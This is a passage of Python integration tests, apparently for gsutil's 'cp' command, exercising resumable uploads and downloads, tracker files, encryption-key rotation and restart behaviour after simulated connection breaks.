self.assertIn('Artifically halting upload', stderr)
# Resume the upload without the original key.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertNotIn('Resuming upload', stderr)
self.assertIn('does not match current encryption key', stderr)
self.assertIn('Restarting upload from scratch', stderr)
# Object should have the new key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY2)
def _ensure_object_unencrypted(self, object_uri_str):
"""Strongly consistent check that the object is unencrypted."""
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
self.assertNotIn('Encryption Key', stdout)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break(self):
"""Tests that an upload can be resumed after a connection break."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_resumable_upload_gzip_encoded_break(self):
"""Tests that a gzip encoded upload can be resumed."""
# Setup the bucket and local data. File contents are randomized to prevent
# them from compressing below the resumable-threshold and failing the test.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
local_uri = self.CreateTempFile(file_name='test.txt', contents=contents)
# Configure boto
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '-J', '--testcallbackfile', test_callback_file, local_uri,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['-D', 'cp', '-J', local_uri,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Ensure the progress logger is still seeing a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
temp_uri = self.CreateTempFile()
remote_uri = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', remote_uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', remote_uri, suri(temp_uri)])
with open(temp_uri, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_retry(self):
"""Tests that a resumable upload completes with one retry."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
# TODO: Raising an httplib or socket error blocks bucket teardown
# in JSON for 60-120s on a multiprocessing lock acquire. Figure out why;
# until then, raise an apitools retryable exception.
if self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, http_client.BadStatusLine, (
'unused',))))
else:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(
5, apitools_exceptions.BadStatusCodeError, ('unused', 'unused',
'unused'))))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=1)
if self.test_api == ApiSelector.XML:
self.assertIn('Got retryable failure', stderr)
else:
self.assertIn('Retrying', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_streaming_upload_retry(self):
"""Tests that a streaming resumable upload completes with one retry."""
if self.test_api == ApiSelector.XML:
return unittest.skip('XML does not support resumable streaming uploads.')
bucket_uri = self.CreateBucket()
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, apitools_exceptions.BadStatusCodeError,
('unused', 'unused', 'unused'))))
# Need to reduce the JSON chunk size since streaming uploads buffer a
# full chunk.
boto_configs_for_test = [('GSUtil', 'json_resumable_chunk_size',
str(256 * ONE_KIB)), ('Boto', 'num_retries', '2')]
with SetBotoConfigForTest(boto_configs_for_test):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, '-',
suri(bucket_uri, 'foo')
],
stdin='a' * 512 * ONE_KIB,
return_stderr=1)
self.assertIn('Retrying', stderr)
@SkipForS3('preserve_acl flag not supported for S3.')
def test_cp_preserve_no_owner(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Anonymous user can read the object and write to the bucket, but does
# not own the object.
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:R', suri(object_uri)])
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:W', suri(bucket_uri)])
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(
['cp', '-p', suri(object_uri),
suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1)
self.assertIn('OWNER permission is required for preserving ACLs', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_progress_callbacks(self):
bucket_uri = self.CreateBucket()
final_size_string = BytesToFixedWidthString(1024**2)
final_progress_callback = final_size_string + '/' + final_size_string
fpath = self.CreateTempFile(contents=b'a' * ONE_MIB, file_name='foo')
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(2 * ONE_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
stderr = self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload(self):
"""Tests that a basic resumable upload completes successfully."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
@SkipForS3('No resumable upload support for S3.')
def test_resumable_upload_break_leaves_tracker(self):
"""Tests that a tracker file is created with a resumable upload."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
try:
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri, 'foo')
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
self.assertTrue(os.path.exists(tracker_filename),
'Tracker file %s not present.' % tracker_filename)
# Test the permissions
if os.name == 'posix':
mode = oct(stat.S_IMODE(os.stat(tracker_filename).st_mode))
# Assert that only user has read/write permission
self.assertEqual(oct(0o600), mode)
finally:
DeleteTrackerFile(tracker_filename)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_size_change(self):
"""Tests a resumable upload where the uploaded file changes size.
This should fail when we read the tracker data.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size * 2)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_content_change(self):
"""Tests a resumable upload where the uploaded file changes content."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'XML doesn\'t make separate HTTP calls at fixed-size boundaries for '
'resumable uploads, so we can\'t guarantee that the server saves a '
'specific part of the upload.')
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * 512)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 384)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'b' * ONE_KIB * 512)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_smaller_size(self):
"""Tests a resumable upload where the uploaded file changes content.
This should fail hash validation.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * 512)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 384)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_resume(self):
"""Tests that an encrypted composite upload resumes successfully."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
file_name = 'foobar'
source_file = self.CreateTempFile(contents=file_contents,
file_name=file_name)
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file
# that points to a previously uploaded component.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
# Create component 0 to be used in the resume; it must match the name
# that will be generated in copy_helper, so we use the same scheme.
encoded_name = (PARALLEL_UPLOAD_STATIC_SALT + source_file).encode(UTF8)
content_md5 = hashlib.md5()
content_md5.update(encoded_name)
digest = content_md5.hexdigest()
component_object_name = (tracker_prefix + PARALLEL_UPLOAD_TEMP_NAMESPACE +
digest + '_0')
component_size = 3
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=component_object_name,
contents=file_contents[:component_size],
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(component_object_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name,
tracker_prefix,
existing_components,
encryption_key_sha256=enc_key_sha256)
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size',
str(component_size)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn('Found 1 existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_restart(self):
"""Tests that encrypted composite upload restarts given a different key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
source_file = self.CreateTempFile(contents=file_contents, file_name='foo')
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
existing_component_name = 'foo_1'
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo_1',
contents=b'foo',
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(existing_component_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name, tracker_prefix,
existing_components,
enc_key_sha256.decode('ascii'))
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '3'),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn(
'does not match current encryption key. '
'Deleting old components and restarting upload', stderr)
self.assertNotIn('existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@SkipForS3('No resumable upload support for S3.')
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file(self):
"""Tests a resumable upload with an unwritable tracker file."""
bucket_uri = self.CreateBucket()
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file_download(self):
"""Tests downloads with an unwritable tracker file."""
object_uri = self.CreateObject(contents=b'foo' * ONE_KIB)
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(object_uri)), TrackerFileType.DOWNLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile()
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(EIGHT_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
# Should succeed because we are below the threshold.
self.RunGsUtil(['cp', suri(object_uri), fpath])
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def _test_cp_resumable_download_break_helper(self,
boto_config,
encryption_key=None):
"""Helper function for different modes of resumable download break.
Args:
boto_config: List of boto configuration tuples for use with
SetBotoConfigForTest.
encryption_key: Base64 encryption key for object encryption (if any).
"""
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=encryption_key)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest(boto_config):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_break(self):
"""Tests that a download can be resumed after a connection break."""
self._test_cp_resumable_download_break_helper([
('GSUtil', 'resumable_threshold', str(ONE_KIB))
])
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_break(self):
"""Tests that an encrypted download resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
self._test_cp_resumable_download_break_helper(
[('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)],
encryption_key=TEST_ENCRYPTION_KEY1)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_key_rotation(self):
"""Tests that a download restarts with a rotated encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
# After simulated connection break, rotate the key on the object.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY1),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['rewrite', '-k', suri(object_uri)])
# Now resume the download using only the new encryption key. Since its
# generation changed, we must restart it.
boto_config_for_test3 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test3):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Restarting download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
@SequentialAndParallelTransfer
def test_cp_resumable_download_etag_differs(self):
"""Tests that download restarts the file when the source object changes.
This causes the etag not to match.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
# This will create a tracker file with an ETag.
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
# Create a new object with different contents - it should have a
# different ETag since the content has changed.
object_uri = self.CreateObject(
bucket_uri=bucket_uri,
object_name='foo',
contents=b'b' * self.halt_size,
gs_idempotent_generation=object_uri.generation)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# TODO: Enable this test for sequential downloads when their tracker files are
# modified to contain the source object generation.
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_resumable_download_generation_differs(self):
"""Tests that a resumable download restarts if the generation differs."""
bucket_uri = self.CreateBucket()
file_contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
# Overwrite the object with an identical object, increasing
# the generation but leaving other metadata the same.
identical_file = self.CreateTempFile(contents=file_contents)
self.RunGsUtil(['cp', suri(identical_file), suri(object_uri)])
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertIn('Restarting download from scratch', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_file_larger(self):
"""Tests download deletes the tracker file when existing file is larger."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
with open(fpath + '_.gstmp', 'w') as larger_file:
for _ in range(self.halt_size * 2):
larger_file.write('a')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
self.assertIn('Deleting tracker file', stderr)
def test_cp_resumable_download_content_differs(self):
"""Tests that we do not re-download when tracker file matches existing file.
We only compare size, not contents, so re-download should not occur even
though the contents are technically different. However, hash validation on
the file should still occur and we will delete the file then because
the hashes differ.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'w') as fp:
fp.write('abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
try:
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Download already complete', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
# File and tracker file should be deleted.
self.assertFalse(os.path.isfile(temp_download_file))
self.assertFalse(os.path.isfile(tracker_filename))
# Permanent file should not have been created.
self.assertFalse(os.path.isfile(fpath))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_content_matches(self):
"""Tests download no-ops when tracker file matches existing file."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
matching_contents = b'abcd' * ONE_KIB
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'wb') as fp:
fp.write(matching_contents)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=matching_contents)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Download already complete', stderr)
# Tracker file should be removed after successful hash validation.
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_tracker_file_not_matches(self):
"""Tests that download overwrites when tracker file etag does not match."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir, contents=b'abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match regex for exactly one object ETag')
etag = etag_match.group(1)
etag += 'nonmatching'
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Ensure the file was overwritten.
with open(fpath, 'r') as in_fp:
contents = in_fp.read()
self.assertEqual(
contents, 'efgh' * ONE_KIB,
'File not overwritten when it should have been '
'due to a non-matching tracker file.')
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_double_gzip(self):
